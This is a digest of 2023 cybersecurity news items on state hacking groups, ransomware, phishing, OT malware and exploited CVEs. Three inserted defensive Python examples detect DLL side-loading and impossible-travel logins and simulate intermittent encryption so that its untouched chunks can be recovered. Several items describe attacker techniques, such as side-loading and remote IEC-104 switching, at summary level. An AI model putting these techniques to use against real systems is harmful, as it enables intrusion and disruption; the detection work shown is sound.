    Losses to fraud reported by UK Finance's more than 300 member firms, which provide credit, banking, markets and payment services in the U.K., declined 8% from 2021, although they still involved 3 million cases of fraud. "These numbers are big but slightly down on where we were in 2021, both in terms of the number of cases and the value of losses," said Lee Hopley, director of economic insight and research at UK Finance. The industry reported preventing about $1.5 billion worth of fraud in 2022, although she said the actual amount is likely higher, given the challenges of measuring fraud prevention.

    Lazarus Hackers Target Windows IIS Web Servers for Initial Access

    The notorious North Korean state-backed hackers, known as the Lazarus Group, are now targeting vulnerable Windows Internet Information Services (IIS) web servers to gain initial access to corporate networks. Lazarus is primarily financially motivated, with many analysts believing that the hackers' malicious activities help fund North Korea's weapons development programs. However, the group has also been involved in several espionage operations. The latest tactic of targeting Windows IIS servers was discovered by South Korean researchers at the AhnLab Security Emergency Response Center (ASEC).

    New OT Malware Possibly Related To Russian Emergency Response Exercises

    COSMICENERGY’s capabilities and overall attack strategy appear reminiscent of the 2016 INDUSTROYER incident, which issued IEC-104 ON/OFF commands to interact with RTUs and, according to one analysis, may have made use of an MSSQL server as a conduit system to access OT. Leveraging this access, an attacker can send remote commands to affect the actuation of power line switches and circuit breakers to cause power disruption. COSMICENERGY accomplishes this via its two derivative components, which we track as PIEHOP and LIGHTWORK. PIEHOP is a disruption tool written in Python and packaged with PyInstaller that is capable of connecting to a user-supplied remote MSSQL server for uploading files and issuing remote commands to an RTU. PIEHOP utilizes LIGHTWORK to issue the IEC-104 commands "ON" or "OFF" to the remote system and then immediately deletes the executable after issuing the command.

    BlackByte Ransomware Claims City of Augusta Cyberattack

    The City of Augusta in Georgia, USA, has verified that the recent disruption to its IT system was a result of unauthorized intrusion into its network. While the administration has not revealed specific details about the nature of the cyberattack, the BlackByte ransomware group has publicly acknowledged the city of Augusta as one of its targeted victims.

    Microsoft 365 Phishing Attacks Use Encrypted RPMSG Messages

    Attackers are now using encrypted RPMSG attachments sent via compromised Microsoft 365 accounts to steal Microsoft credentials in targeted phishing attacks designed to evade detection by email security gateways. RPMSG files (also known as restricted permission message files) are encrypted email message attachments created using Microsoft's Rights Management Services (RMS) and offer an extra layer of protection to sensitive info by restricting access to authorized recipients. To access and read the encrypted contents of RPMSG attachments, recipients are required to either authenticate using their Microsoft account or acquire a one-time passcode for decryption.

    New Buhti Ransomware Uses Leaked Payloads and Public Exploits

    A relatively new ransomware operation calling itself Buhti appears to be eschewing developing its own payload and is instead utilizing variants of the leaked LockBit and Babuk ransomware families to attack Windows and Linux systems. While the group doesn’t develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types. Buhti, which first came to public attention in February 2023, was initially reported to be attacking Linux computers. However, Symantec’s Threat Hunter Team has also uncovered attempts to attack Windows computers on compromised networks.

    ‘Operation Magalenha’ Targets Credentials of 30 Portuguese Banks

    A report from SentinelLabs has revealed the details of this campaign, shedding light on the tools utilized by the threat actor, the different methods of infection employed, and the techniques used to distribute their malware. The analysts obtained information regarding the origin and tactics of the threat actor through the discovery of a server misconfiguration that inadvertently exposed files, directories, internal correspondence, and other sensitive data.

    North Korea-Linked Lazarus APT Targets Microsoft IIS Servers to Deploy Malware

    Researchers at AhnLab Security Emergency Response Center (ASEC) have revealed that the Lazarus APT Group, a threat actor associated with North Korea, has been focusing its attention on exploiting vulnerable Microsoft IIS servers. Through the use of DLL side-loading, the attackers deploy a malicious DLL file named msvcr100[.]dll, which is strategically placed in the same directory as a legitimate application called Wordconv[.]exe. By launching that application from the compromised Windows IIS web server process, the attackers get the malicious library loaded and executed to carry out their activities.
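    The side-loading pattern described above (a runtime DLL that normally lives only under %SystemRoot% appearing next to an unrelated executable) is something a defender can hunt for in a file inventory. The following is an added example, not code from the page or from ASEC: it flags watch-listed DLL names found outside the trusted Windows directories in a folder that also contains an executable. The watch-list, the trusted-directory prefixes and the sample file listing are assumptions constructed for the example; a hit is only a candidate and still needs a hash or Authenticode check, since legitimate applications do ship the VC++ runtime beside their binaries.

```python
"""Hunt for DLL side-loading candidates in a constructed file inventory."""
from pathlib import PureWindowsPath

# Assumption: DLL names commonly abused for side-loading. msvcr100.dll is the
# name reported in the Lazarus/IIS case; the others are illustrative additions.
WATCHLIST = {"msvcr100.dll", "msvcp100.dll", "version.dll", "dbghelp.dll"}

# Assumption: directories where these DLLs are expected to live.
TRUSTED_DIR_PREFIXES = (
    "windows\\system32",
    "windows\\syswow64",
    "windows\\winsxs",
)


def _is_trusted_dir(directory: PureWindowsPath) -> bool:
    lowered = str(directory).lower()
    return any(prefix in lowered for prefix in TRUSTED_DIR_PREFIXES)


def sideload_candidates(paths):
    """Return full paths of watch-listed DLLs that sit outside the trusted
    Windows directories and share a folder with at least one .exe."""
    entries = [PureWindowsPath(p) for p in paths]
    # Folders that contain an executable, keyed case-insensitively.
    exe_dirs = {str(p.parent).lower() for p in entries if p.suffix.lower() == ".exe"}

    hits = []
    for p in entries:
        if p.name.lower() not in WATCHLIST:
            continue
        if _is_trusted_dir(p.parent):
            continue  # expected location for a system runtime DLL
        if str(p.parent).lower() in exe_dirs:
            hits.append(str(p))
    return hits


# Constructed inventory (assumption); paths are illustrative, not from the report.
SAMPLE_LISTING = [
    r"C:\Windows\System32\msvcr100.dll",          # legitimate system copy
    r"C:\inetpub\wwwroot\temp\Wordconv.exe",       # benign host executable
    r"C:\inetpub\wwwroot\temp\msvcr100.dll",       # runtime DLL planted beside it
    r"C:\Program Files\App\app.exe",
    r"C:\Program Files\App\helper.dll",            # not a watch-listed name
    r"C:\Users\Public\version.dll",                # no executable in the folder
]


if __name__ == "__main__":
    for hit in sideload_candidates(SAMPLE_LISTING):
        print("side-load candidate:", hit)
```

    The folder rule deliberately ignores a lone DLL with no executable beside it (C:\Users\Public\version.dll in the sample): such a file is worth a look for other reasons, but it is not a side-loading setup until something in that folder imports it.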

    Chinese Hackers Breach US Critical Infrastructure in Stealthy Attacks

    This advisory highlights the recent state-sponsored cyber activity by the People's Republic of China (PRC) and provides crucial information for network defenders to identify and mitigate this activity. The advisory focuses on network and host artifacts, particularly command lines used by the cyber actor, and includes indicators of compromise (IOCs) for reference. However, defenders should exercise caution and evaluate matches to determine their significance, considering the possibility of false positive indicators resulting from benign activity.

    New PowerExchange Malware Backdoors Microsoft Exchange Servers

    FortiEDR research lab has identified a targeted attack against a government entity in the United Arab Emirates, involving a custom PowerShell-based backdoor called PowerExchange. The backdoor utilizes the victim's Microsoft Exchange server as its command and control (C2) server, operating through an email-based C2 protocol. The investigation revealed multiple implants and a unique web shell named ExchangeLeech, capable of credential harvesting. The indicators point to an Iranian threat actor as the perpetrator of these attacks. The attack chain starts with email phishing and the execution of a malicious .NET executable. The backdoor establishes communication with the Exchange server, sends and receives commands through mailboxes, and executes malicious payloads.

    North Korean APT Group Kimsuky Shifting Attack Tactics

    North Korean hackers belonging to the Kimsuky group are employing custom-built malware to carry out information exfiltration campaigns against organizations supporting human rights activists and North Korean defectors. The cybersecurity firm SentinelOne discovered a new variant of the RandomQuery malware, which is commonly used by the Pyongyang threat actor. Kimsuky specializes in targeting think tanks and journalists. The malware is distributed through compiled HTML files, a tactic frequently used by North Korean hackers. The variation of RandomQuery in this campaign has the “single objective of file enumeration and information exfiltration,” in contrast to recently observed North Korean use of the malware to support a wider array of functions such as keylogging and the execution of additional malware.

    GoldenJackal State Hackers Silently Attacking Govts Since 2019

    Kaspersky recently disclosed the activities of a lesser-known advanced persistent threat group called GoldenJackal. This group has been engaged in espionage against government and diplomatic organizations in Asia since 2019. To maintain a covert presence, the threat actors have been cautious in their operations. They carefully choose their targets and limit the frequency of their attacks, aiming to minimize the risk of detection. Kaspersky, which has been monitoring GoldenJackal since 2020, has revealed that the group is active in Afghanistan, Azerbaijan, Iran, Iraq, Pakistan, and Turkey.

    SuperMailer Abuse Bypasses Email Security for Super-Sized Credential Theft

    A large-scale operation focused on harvesting credentials has emerged, utilizing a legitimate email newsletter program called SuperMailer to distribute a substantial volume of phishing emails. The intention behind this campaign is to bypass secure email gateway protections. Recent findings from Cofense, as of May 23, reveal that SuperMailer-generated emails account for a significant portion of all credential phishing attempts, constituting approximately 5% of the firm's telemetry for May.

    IT Employee Piggybacked on Cyberattack for Personal Gain

    A former IT employee of an Oxford-based company has been convicted of blackmailing his employer and unauthorized access to a computer for personal gain. After a cyber security incident at the company, the employee took advantage of the breach by accessing a board member's private emails, altering the original blackmail email, and changing the payment address.

    State-Aligned Actors Targeting SMBs Globally

    Proofpoint researchers have discovered that advanced persistent threat (APT) actors are increasingly targeting small and medium-sized businesses (SMBs), governments, militaries, and major corporations through compromised SMB infrastructure in phishing campaigns. These threat actors are also launching financially motivated attacks against SMB financial services firms and carrying out supply chain attacks affecting SMBs. Proofpoint emphasizes the tangible risk that APT actors pose to SMBs today through the compromise of their infrastructure.

    Barracuda Warns of Email Gateways Breached via Zero-Day Flaw

    Barracuda, a company specializing in email and network security solutions, informed its customers that some of their Email Security Gateway (ESG) appliances were breached due to a recently patched zero-day vulnerability. The vulnerability was discovered on May 19 and was promptly addressed with security patches on May 20 and 21. Barracuda confirmed unauthorized access to a subset of ESG appliances but assured customers that its other products were unaffected. Impacted organizations were notified, and Barracuda advised them to review their environments for any potential spread of the threat actors to other devices on the network. Details regarding the number of affected customers and potential data impact were not provided.

    A Deeper Insight Into the Cloudwizard APT’s Activity Revealed a Long-Running Activity

    Researchers warn of a threat actor known as CloudWizard APT, which is actively targeting organizations operating in the Russo-Ukrainian conflict region. In March 2023, Kaspersky researchers discovered the new APT group, also referred to as Bad Magic or Red Stinger, engaging in cyber attacks against entities in the same area. The attackers utilized the PowerMagic and CommonMagic implants in their operations. During their investigation, the researchers discovered another set of highly advanced malicious activities linked to the same threat actor, demonstrating even greater sophistication.

    Food Distributor Sysco Says Cyberattack Exposed 126,000 Individuals

    “A multinational company headquartered in Houston, Texas, Sysco is one of the largest distributors of food products, kitchen equipment, smallware, and tabletop products to restaurants, lodging establishments, healthcare and education organizations, and other entities” (Security Week, 2023). The company initially disclosed the incident in early May, in a Form 10-Q filing with the US Securities and Exchange Commission (SEC), when it revealed that the data breach was identified on March 5, 2023, but said that the attackers likely had unauthorized access to its systems starting January 14, 2023.

    Batloader Campaign Impersonates ChatGPT and Midjourney to Deliver Redline Stealer

    In the campaign observed by the researchers, threat actors are using BatLoader in the form of MSIX Windows App Installer files to deliver the Redline Stealer. In February 2023, eSentire reported another BatLoader campaign targeting users searching for AI tools. “Both AI services are extremely popular but lack first-party standalone apps (i.e., users interface with ChatGPT via their web interface while Midjourney uses Discord). This vacuum has been exploited by threat actors looking to drive AI app-seekers to imposter web pages promoting fake apps.”

    Vulnerability in Zyxel Firewalls May Soon Be Widely Exploited (CVE-2023-28771)

    Rapid7 researchers have issued a warning regarding a recently patched command injection vulnerability (CVE-2023-28771) in various Zyxel firewalls. They have published a technical analysis and a proof-of-concept (PoC) script that demonstrates the vulnerability, enabling an attacker to gain a reverse root shell. The affected devices include Zyxel ATP, USG FLEX, and VPN firewalls running ZLD firmware versions v4.60 to v5.35, as well as Zyxel ZyWALL/USG gateways/firewalls running ZLD v4.60 to v4.73. These firewall devices perform network traffic monitoring and control, possess VPN and SSL inspection capabilities, and provide additional protection against malware and other threats.

    Phishing Vendor Sells IP Addresses to Duck Anomaly Detection

    A large-scale phishing-as-a-service operation is shifting tactics to allow attackers to avoid anomaly detection by using localized IP addresses, warns Microsoft. The computing giant discovered the provider in 2021 after detecting a phishing campaign that used more than 300,000 domains and unique subdomains in a single run. BulletProofLink, also referred to as BulletProftLink or Anthrax, sells access to phishing kits, email templates, hosting, and automated services "at a relatively low cost.”

    Shifting Tactics Fuel Surge in Business Email Compromise

    Business email fraud continues to rise, with the Federal Bureau of Investigation (FBI) reporting more than 21,000 complaints with adjusted losses over $2.7 billion. Microsoft has observed an increase in sophistication and tactics by threat actors specializing in business email compromise (BEC), including leveraging residential internet protocol (IP) addresses to make attack campaigns appear locally generated. This new tactic is helping criminals further monetize Cybercrime-as-a-Service (CaaS) and has caught federal law enforcement’s attention because it allows cybercriminals to evade “impossible travel” alerts used to identify and block anomalous login attempts and other suspicious account activity.
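    The “impossible travel” alert that the two items above say residential IP addresses are being used to defeat is simple to reason about once written down: take a user's consecutive sign-ins, compute the great-circle distance between the geolocated IPs, divide by the elapsed time and alert when the implied speed is faster than an airliner. The code below is an added example, not Microsoft's detection logic or the FBI's; the sign-in records, their coordinates and the 900 km/h threshold are constructed assumptions (a real pipeline would get coordinates from a geo-IP lookup). The second sample user shows the evasion the text describes: a sign-in from an IP located in the same city as the victim's usual one produces no alert, which is exactly why the residential-proxy market exists.

```python
"""Impossible-travel check over constructed sign-in events."""
from dataclasses import dataclass
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

EARTH_RADIUS_KM = 6371.0
SAME_AREA_KM = 50.0   # below this, treat as the same metro area (geo-IP jitter)


@dataclass(frozen=True)
class SignIn:
    user: str
    ts: datetime
    ip: str
    lat: float   # assumption: coordinates already resolved from the IP
    lon: float


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two WGS84 points."""
    p1, p2 = radians(lat1), radians(lat2)
    dphi = p2 - p1
    dlmb = radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(p1) * cos(p2) * sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def impossible_travel(events, max_kmh=900.0):
    """Return (earlier, later, km, kmh) tuples for consecutive sign-ins by the
    same user whose implied travel speed exceeds max_kmh."""
    by_user = {}
    for e in sorted(events, key=lambda e: (e.user, e.ts)):
        by_user.setdefault(e.user, []).append(e)

    flagged = []
    for evs in by_user.values():
        for prev, cur in zip(evs, evs[1:]):
            km = haversine_km(prev.lat, prev.lon, cur.lat, cur.lon)
            if km < SAME_AREA_KM:
                continue  # same city: residential-proxy logins land here
            hours = (cur.ts - prev.ts).total_seconds() / 3600
            kmh = km / hours if hours > 0 else float("inf")
            if kmh > max_kmh:
                flagged.append((prev, cur, km, kmh))
    return flagged


# Constructed sample (assumption): documentation-range IPs, hand-placed coordinates.
SAMPLE_EVENTS = [
    # alice: London at 09:00, then an IP located in Lagos one hour later
    SignIn("alice", datetime(2023, 5, 1, 9, 0), "203.0.113.5", 51.5074, -0.1278),
    SignIn("alice", datetime(2023, 5, 1, 10, 0), "198.51.100.7", 6.5244, 3.3792),
    # bob: London, then a "residential" IP a few kilometres away 30 minutes later
    SignIn("bob", datetime(2023, 5, 1, 9, 0), "203.0.113.9", 51.5074, -0.1278),
    SignIn("bob", datetime(2023, 5, 1, 9, 30), "192.0.2.44", 51.5155, -0.0922),
]


if __name__ == "__main__":
    for prev, cur, km, kmh in impossible_travel(SAMPLE_EVENTS):
        print(f"{cur.user}: {prev.ip} -> {cur.ip}, {km:.0f} km in "
              f"{(cur.ts - prev.ts)}, {kmh:.0f} km/h")
```

    Because the residential-IP case is invisible to distance-based logic, the practical follow-up is to correlate on something the proxy cannot fake cheaply, such as a new device fingerprint or an unfamiliar ASN for that user, rather than raising the speed threshold.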

    CISA Warns of Samsung ASLR Bypass Flaw Exploited in Attacks

    CISA warned last Friday of a security vulnerability affecting Samsung devices which has been used in attacks to bypass Android address space layout randomization (ASLR) protection. ASLR is an Android security feature that randomizes the memory addresses where key app and OS components are loaded into the device's memory. This makes it more difficult for attackers to exploit memory-related vulnerabilities and successfully launch attacks like buffer overflow, return-oriented programming, or other memory-based exploits.

    Trojan-Rigged Phishing Attacks Pepper China-Taiwan Conflict

    New findings reveal a significant increase in cyber espionage attacks targeting Taiwanese organizations, coinciding with recent political tensions. According to research by Trellix, the number of malicious phishing emails aimed at Taiwanese companies surged between April 7 and April 10 of this year. The most affected sectors were networking/IT, manufacturing, and logistics.

    LockBit Leaks 1.5TB of Data Stolen From Indonesia's BSI Bank

    The LockBit ransomware group has leaked 1.5 terabytes of personal and financial data from Bank Syariah Indonesia (BSI) after failed ransom negotiations. The stolen data includes information from approximately 15 million customers and employees of the country's largest Islamic bank. BSI has restored its key banking services under the supervision of Bank Indonesia. BSI initially experienced disruptions due to a cyberattack, but LockBit claims the bank misled customers by attributing the issues to technical maintenance.

    8220 Gang Exploiting Oracle WebLogic Flaw to Hijack Servers and Mine Cryptocurrency

    The notorious cryptojacking group tracked as 8220 Gang has been spotted weaponizing a six-year-old security flaw in Oracle WebLogic servers to ensnare vulnerable instances into a botnet and distribute cryptocurrency mining malware. The flaw in question is CVE-2017-3506 (CVSS score: 7.4), which, when successfully exploited, could allow an unauthenticated attacker to execute arbitrary commands remotely. ‘This allows attackers to gain unauthorized access to sensitive data or compromise the entire system,’ Trend Micro researcher Sunil Bharti said in a report published this week. 8220 Gang, first documented by Cisco Talos in late 2018, is so named for its original use of port 8220 for command-and-control (C2) network communications.

    Hackers Target Vulnerable Wordpress Elementor Plugin After PoC Released

    Hackers are now actively probing for vulnerable Essential Addons for Elementor plugin versions on thousands of WordPress websites in massive Internet scans, attempting to exploit a critical account password reset flaw disclosed earlier in the month. The critical-severity flaw is tracked as CVE-2023-32243 and impacts Essential Addons for Elementor versions 5.4.0 to 5.7.1, allowing unauthenticated attackers to arbitrarily reset the passwords of administrator accounts and assume control of the websites. The flaw that impacted over a million websites was discovered by PatchStack on May 8th, 2023, and fixed by the vendor on May 11th, with the release of the plugin's version 5.7.2.

    Lemon Group Uses Millions of Pre-Infected Android Phones to Enable Cybercrime Enterprise

    Every day, numerous Android phone users worldwide unknowingly contribute to the financial gains of an organization known as the Lemon Group simply by owning their devices. What these users are unaware of is that the Lemon Group has pre-infected their phones even before they purchase them. As a result, the Lemon Group secretly exploits these devices, utilizing them to steal and sell SMS messages and one-time passwords (OTPs), display unwanted advertisements, create online messaging and social media accounts, and carry out various other activities.

    BianLian Skips Encryption On Way To Extortion

    The U.S. cybersecurity agency has warned that the BianLian ransomware group is shifting from malicious encryption to pure extortion. Instead of double extortion, the group now demands a ransom for keeping stolen data secret. The group's change in tactics is likely influenced by the release of a free decryptor by cybersecurity firm Avast. BianLian gains initial access to networks through compromised remote desktop protocol credentials, acquired from brokers or through phishing. They implant a customized backdoor and install remote management tools like TeamViewer.

    MalasLocker Ransomware Targets Zimbra Servers, Demands Charity Donation

    A new ransomware operation is hacking Zimbra servers to steal emails and encrypt files. However, instead of demanding a ransom payment, the threat actors claim to require a donation to charity to provide an encryptor and prevent data leaking. The ransomware operation, dubbed MalasLocker by BleepingComputer, began encrypting Zimbra servers towards the end of March 2023, with victims reporting in both the BleepingComputer and Zimbra forums that their emails were encrypted.

    Cisco Warns of Critical Switch Bugs With Public Exploit Code

    Yesterday, Cisco published an advisory, warning customers of four critical remote code execution vulnerabilities (CVE-2023-20159, CVE-2023-20160, CVE-2023-20161, and CVE-2023-20189) impacting several of its Small Business Series Switches. The four flaws received a CVSS score of 9.8 out of 10 and are due to an improper validation of requests sent to the targeted switches’ web interfaces. A successful exploit of the issues could enable unauthenticated actors to execute arbitrary code with root privileges on targeted devices.

    New ZIP Domains Spark Debate Among Cybersecurity Experts

    Cybersecurity researchers and IT admins have raised concerns over Google's new ZIP and MOV Internet domains, warning that threat actors could use them for phishing attacks and malware delivery. Earlier this month, Google introduced eight new top-level domains (TLDs) that can be purchased for hosting websites or email addresses: .dad, .esq, .prof, .phd, .nexus, .foo, and, the subject of this article, .zip and .mov. The concern is that .zip and .mov are also ubiquitous file extensions, so a filename such as "update.zip" in an email or chat message can be turned into a clickable link by the client and resolve to an attacker-registered domain.

    FBI Confirms BianLian Ransomware Switch to Extortion Only Attacks

    A recent collaboration between government agencies in the United States and Australia, led by CISA, has resulted in a joint Cybersecurity Advisory. The advisory highlights the latest tactics, techniques, and procedures (TTPs) employed by the BianLian ransomware group, which has been actively targeting critical infrastructure in both countries since June 2022. As part of the broader #StopRansomware initiative, this advisory draws on investigations conducted by the FBI and the Australian Cyber Security Centre (ACSC) up until March 2023.

    State-Sponsored Sidewinder Hacker Group's Covert Attack Infrastructure Uncovered

    Group-IB recently uncovered a previously undocumented attack infrastructure used by SideWinder, a prolific state-sponsored group, to target entities located in Pakistan and China. The infrastructure comprises 55 domains and IP addresses, which researchers identified as phishing domains mimicking organizations in the news, government, telecommunications, and financial sectors.

    Feds Charge Russian, Chinese Nationals With Illegal Exports

    U.S. federal prosecutors have announced indictments and arrests related to illegal technology exports to Russia, China, and Iran. The cases involve individuals accused of smuggling military and dual-use technology, including tactical military antennas, lasers, pressure sensors, and other electronics. The Biden administration has vowed to crack down on export violations and has created the Disruptive Technology Strike Force. The cases highlight the efforts to prevent advanced technology from falling into the hands of foreign adversaries who may use them to threaten national security and democratic values.

    Hackers Infect TP-Link Router Firmware to Attack EU Entities

    A Chinese state-sponsored hacking group named "Camaro Dragon" infects residential TP-Link routers with a custom "Horse Shell" malware used to attack European foreign affairs organizations. The backdoor malware is deployed in a custom and malicious firmware designed specifically for TP-Link routers so that the hackers can launch attacks appearing to originate from residential networks.

    Industrial Cellular Routers at Risk: 11 New Vulnerabilities Expose OT Networks

    During last week’s Black Hat Asia 2023 conference, Israeli industrial cybersecurity firm OTORIO disclosed several vulnerabilities in cloud management platforms associated with three industrial cellular router vendors that could expose OT networks to external attacks. In total 11 vulnerabilities were disclosed, which could enable threat actors to execute code remotely and take control over hundreds of thousands of devices and OT networks. In particular, the flaws impact cloud-based management solutions offered by Sierra Wireless, Teltonika Networks, and InHand Networks to remotely manage and operate devices.

    BEC Attackers Spoof CC'd Execs to Force Payment

    Security experts have discovered a fresh advancement in business email compromise tactics aimed at intensifying the recipient's urgency to settle a counterfeit invoice. Referred to as "VIP Invoice Authentication Fraud" by Armorblox, this strategy involves deceptive emails that imitate reputable vendors or familiar third parties regularly receiving payments from the targeted organization. The scammer initiates an invoice request targeting an individual, often in the finance team of the targeted organization. What sets this tactic apart from others is that the scammer also includes the recipient's boss in the email thread, using a fake email domain that closely resembles the boss's actual email address.

    New RA Group Ransomware Targets U.S. Orgs in Double-Extortion Attacks

    A new ransomware group named 'RA Group' is targeting pharmaceutical, insurance, wealth management, and manufacturing firms in the United States and South Korea. The new ransomware operation started in April 2023, when they launched a data leak site on the dark web to publish victims' details and stolen data, engaging in the typical 'double-extortion' tactic used by most ransomware gangs.

    PharMerica Reports Breach Affecting Nearly 6 Million People

    PharMerica, an institutional pharmacy, suffered a significant data breach in March, affecting nearly 6 million current and deceased patients. Hackers, allegedly from the Money Message ransomware group, accessed personal information such as names, birthdates, Social Security numbers, medications, and health insurance details. The group leaked spreadsheets containing patient data on the dark web and also posted internal business documents,

    Open-source Cobalt Strike Port 'Geacon' Used in macOS Attacks

    Geacon, a Go-based implementation of the beacon from the widely abused penetration testing suite Cobalt Strike, is being used more and more to target macOS devices. Both Geacon and Cobalt Strike are utilities that legitimate organizations use to simulate attacks against their networks and improve defenses, but threat actors have also relied on them for attacks.

    CISA Warns of Critical Ruckus Bug Used to Infect Wi-Fi Access Points

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned last Friday of a critical remote code execution (RCE) flaw in the Ruckus Wireless Admin panel actively exploited by a recently discovered DDoS botnet. While this security bug (CVE-2023-25717) was addressed in early February, many owners are likely yet to patch their Wi-Fi access points. Furthermore, no patch is available for those who own end-of-life models affected by this issue.

    Enigmatic Hacking Group Operating in Ukraine

    A newly uncovered hacking group with a string of cyberespionage successes is targeting Ukrainian and pro-Russian targets alike, its motivations uncertain in a conflict that offers little to no middle ground. Malwarebytes in a Wednesday blog post dubs the threat actor "Red Stinger," saying the group is the same as the "Bad Magic" threat actor revealed by Kaspersky in March. Malwarebytes says it traced Red Stinger activities back to 2020, while Kaspersky says it spotted the group in October 2022 - the dates suggesting an investment in stealthy techniques and operational security.

    Discord Discloses Data Breach After Support Agent Got Hacked

    Discord, a popular communication platform, recently experienced a data breach after one of its support agents was hacked. The incident was reported by Discord on their official blog. The breach occurred due to unauthorized access to the support agent's account, which allowed the attacker to gain access to certain user data. Discord confirmed that the breach did not affect the entire user database and that only a small portion of users were impacted.

    Researchers Uncover Powerful Backdoor and Custom Implant in Year-Long Cyber Campaign

    Symantec recently disclosed details of a year-long running campaign targeting government, aviation, education, and telecom sectors located in South and Southeast Asia. Dubbed Lancefly, the operation commenced in mid-2022 and continued until the first quarter of 2023. According to researchers, they observed the actors deploying a powerful backdoor dubbed Merdoor, which has been around since 2018.

    XWorm Malware Exploits Follina Vulnerability in New Wave of Attacks

    Cybersecurity researchers have discovered an ongoing phishing campaign that makes use of a unique attack chain to deliver the XWorm malware on targeted systems. Securonix, which is tracking the activity cluster under the name MEME#4CHAN, said some of the attacks have primarily targeted manufacturing firms and healthcare clinics located in Germany. "The attack campaign has been leveraging rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload to infect its victims," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a new analysis.

    Multinational Tech Firm ABB Hit by Black Basta Ransomware Attack

    ABB, a leading provider of electrification and automation technology, has suffered a Black Basta ransomware attack that has reportedly impacted its business operations. The multinational company, headquartered in Zurich, Switzerland, employs approximately 105,000 workers and recorded $29.4 billion in revenue for 2022. ABB's services include the development of industrial control systems and SCADA systems for energy suppliers and manufacturing.

    Stealthier Version of Linux BPFDoor Malware Spotted in the Wild

    A new, stealthier variant of the Linux malware 'BPFDoor' has been discovered, featuring more robust encryption and reverse shell communications. BPFDoor is a stealthy backdoor that has been active since at least 2017 but was only discovered by security researchers around 12 months ago. The malware gets its name from its use of the Berkeley Packet Filter (BPF): it attaches a BPF filter to a raw socket, so the "magic" packets carrying its instructions reach it without any listening port and regardless of the host firewall's port rules.

    Bl00dy Ransomware Gang Strikes Education Sector with Critical PaperCut Vulnerability

    U.S. cybersecurity and intelligence agencies have warned of attacks carried out by a threat actor known as the Bl00dy Ransomware Gang that attempt to exploit vulnerable PaperCut servers against the education facilities sector in the country. The attacks took place in early May 2023, the Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) said in a joint cybersecurity advisory issued Thursday.

    Fake In-Browser Windows Updates Push Aurora Info-Stealer Malware

    A malvertising campaign was recently detected using an in-browser Windows Update simulation to deceive users into installing the Aurora information-stealing malware. Aurora, which is written in Go, has been advertised on hacker forums for over a year as a highly capable info-stealer with low anti-virus detection rates. The campaign, as reported by Malwarebytes researchers, relies on popunder ads on high-traffic adult content websites to redirect unsuspecting users to a page that serves the malware.

    Feds Warn of Rise in Attacks Involving Veeam Software Flaw

    Federal authorities have issued a warning about an increase in cyberattacks targeting Veeam's backup application in the healthcare sector. The attacks exploit a high-severity vulnerability (CVE-2023-27532) in Veeam Backup & Replication that can lead to unauthorized access, data theft, or ransomware deployment. The vulnerability affects all unpatched versions of the software and poses a significant threat to healthcare environments that rely on Veeam to protect and restore files and applications.

    New Ransomware Decryptor Recovers Data From Partially Encrypted Files

    A new 'White Phoenix' ransomware decryptor allows victims to partially recover files encrypted by ransomware strains that use intermittent encryption. Intermittent encryption is a strategy employed by several ransomware groups that alternates between encrypting and not encrypting chunks of data. This method allows a file to be encrypted much faster while still leaving the data unusable by the victim.
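    As an added illustration (not White Phoenix's own code), the following Python simulates intermittent encryption on a constructed document and then carves the chunks the ransomware skipped by measuring per-chunk byte entropy, which is the property that makes partial recovery possible without the key. The 256-byte chunk size, the every-other-chunk schedule, the SHA-256 keystream standing in for the ransomware's cipher, and the 6.0-bit entropy threshold are all assumptions chosen for the demonstration.

```python
"""Added example: intermittent encryption and entropy-based carving of the
chunks it leaves in the clear. Not White Phoenix's code; sample data and
parameters are constructed for the demonstration."""
import hashlib
import math

CHUNK = 256            # assumption: the ransomware works in 256-byte chunks
EVERY = 2              # assumption: it encrypts every second chunk
THRESHOLD = 6.0        # bits/byte; 256 random bytes score ~7.1, English text ~4.5
KEY = b"constructed-demo-key"

# Constructed sample "document": 1960 bytes of low-entropy text.
SAMPLE = b"Invoice 2023-05 Patient record: name, dob, plan. " * 40


def keystream(key: bytes, length: int) -> bytes:
    """Deterministic keystream from SHA-256(key || counter); a stand-in for
    whatever stream cipher the real ransomware uses."""
    out = bytearray()
    ctr = 0
    while len(out) < length:
        out += hashlib.sha256(key + ctr.to_bytes(8, "big")).digest()
        ctr += 1
    return bytes(out[:length])


def intermittent_encrypt(data: bytes, key: bytes) -> bytes:
    """Encrypt chunks 0, EVERY, 2*EVERY, ... and leave the others untouched,
    which is what makes the file unusable yet quick to process."""
    ks = keystream(key, len(data))
    out = bytearray(data)
    for start in range(0, len(data), CHUNK):
        if (start // CHUNK) % EVERY == 0:
            for i in range(start, min(start + CHUNK, len(data))):
                out[i] ^= ks[i]
    return bytes(out)


def shannon_entropy(buf: bytes) -> float:
    """Bits of entropy per byte of buf (0.0 for an empty buffer)."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def carve_plaintext(blob: bytes) -> list[tuple[int, bytes]]:
    """Return (offset, bytes) for every chunk whose entropy is below THRESHOLD,
    i.e. the chunks the ransomware never touched. Needs no key."""
    kept = []
    for start in range(0, len(blob), CHUNK):
        part = blob[start:start + CHUNK]
        if shannon_entropy(part) < THRESHOLD:
            kept.append((start, part))
    return kept


def recovered_fraction(original: bytes, blob: bytes) -> float:
    """Fraction of the original bytes that carving recovers verbatim."""
    good = sum(len(part) for off, part in carve_plaintext(blob)
               if original[off:off + len(part)] == part)
    return good / len(original)


if __name__ == "__main__":
    encrypted = intermittent_encrypt(SAMPLE, KEY)
    for off, part in carve_plaintext(encrypted):
        print(f"offset {off:5d}: {len(part):3d} clear bytes")
    print(f"recovered {recovered_fraction(SAMPLE, encrypted):.0%} of the file")
```

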